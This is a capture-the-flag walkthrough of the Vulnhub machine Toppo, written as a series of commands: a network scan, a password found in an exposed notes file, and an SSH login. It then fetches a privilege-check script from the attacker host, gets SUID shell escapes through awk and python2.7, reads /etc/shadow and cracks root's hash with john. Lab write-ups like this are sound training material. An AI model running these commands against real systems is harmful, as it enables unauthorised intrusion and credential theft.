Vulnhub Write-up — Toppo

This is the write-up of the Machine Toppo from Vulnhub.

DIGEST

Toppo is a beginner friendly machine based on a Linux platform. With the help of note.txt from the admin got the user and exploiting SUID Executables to gain the Root.

Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner

The IP address is given so no need for netdiscover.


Scanning The Network

nmap -sC -sV 192.168.0.103
man nmap
nmap on Toppo

Dirbuster on port 80

Dirbuster Result

Got the notes.txt under admin directory.

/admin/notes.txt

Above notes gives us the password:- 12345ted123

So let's try to guess the username ted and try to login into ssh.


Own User

Login into ssh
$whoami ;id
man whoami ;id
Own User

Privilege Escalation

I am using this script to find out the privilege escalation methods.

$python -m SimpleHTTPServer

Starting the web server locally to upload the privchecker on the toppo machine.

starting python server

Finding the Host machine IP address.

host machine IP

Downloading the script on the machine(toppo)


$wget http://192.168.0.105:8000/linuxprivchecker.py
man wget
Downloading the privchecker in toppo
$chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py

Running the script on toppo.

Running privchecker

It will give some way to Escape Sequences, I am trying using awk, you can try any of them.

Output

Root using awk

$ awk 'BEGIN{system("/bin/sh")}'
man awk
Own user using awk

/bin/bash did not give us root, this is because bash has privilege escalation protection. but there is no such thing in /bin/sh.

Let's try a different method for Privilege Escalation while searching on the internet I found this article.

Root using python

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
snap from the above URL
FInding the perm

python2.7 can exploitable. See the SUID bits

$python2.7 -c “import pty; pty.spawn(‘/bin/sh’);”
Own user using python

Cracking the root password

$awk 'BEGIN{system("cat /etc/shadow")}'
/etc/shadow file
awk 'BEGIN{system("cat /etc/passwd")}'
/etc/passwd file
$unshadow passwd shadow < crack
man unshadow
unshadow passwd & shadow file
john --wordlist /usr/share/john/password.lst crack
man john
finding the hash type using the john
john --wordlist /usr/share/john/password.lst crack --format =sha512crypt
cracking the root password using the john

Own Root

Own root using the password
FLag

0wnedlab{p4ssi0n_c0me_with_pract1ce}